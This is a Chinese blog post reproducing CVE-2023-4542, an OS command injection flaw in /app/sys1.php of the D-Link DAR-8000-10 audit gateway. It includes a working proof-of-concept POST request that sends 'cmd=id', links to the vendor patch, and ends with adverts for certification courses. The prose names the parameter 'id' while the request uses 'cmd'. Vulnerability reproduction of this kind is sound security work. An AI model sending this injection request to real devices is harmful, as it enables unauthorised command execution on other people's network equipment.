正文

CVE-2023-4542 RCE漏洞(附EXP)文末有活动

admin
admin V管理员 /0 评论 /519 阅读
1027
此篇文章发布距今已超过730天,您需要注意文章的内容或图片是否可用!



网安引领时代,弥天点亮未来   





 


0x00写在前面

      本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!


0x01漏洞介绍


D-Link DAR-8000是中国友讯(D-Link)公司的上网行为审计网关。

D-Link DAR-8000-10版本存在操作系统命令注入漏洞,该漏洞源于文件/app/sys1.php的参数id会导致操作系统命令注入。



0x02影响版本


影响D-Link DAR-8000-10版本


1.访问漏洞环境

2.对漏洞进行复现

 POC (POST)

POST /app/sys1.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Te: trailersConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 6
cmd=id

漏洞复现命令执行成功

id

       pwd



0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

http://www.dlink.com.cn/https://www.iotsec-zone.com/article/413#cve-2023-4542



弥天简介

学海浩茫,予以风动,必降弥天之润!弥天弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。

口号 网安引领时代,弥天点亮未来

网 安 考 证
需要考以下各类安全证书的可以联系我,双11全年最、组团有惊喜!

CISP-PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001...

11.11超值活动~

有想法可以长按图片扫码找我咨询~



往期推荐 · 有彩蛋








走过路过的大佬们留个关注再走呗

往期文章有彩蛋哦


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
ZhouSa.com-周飒博客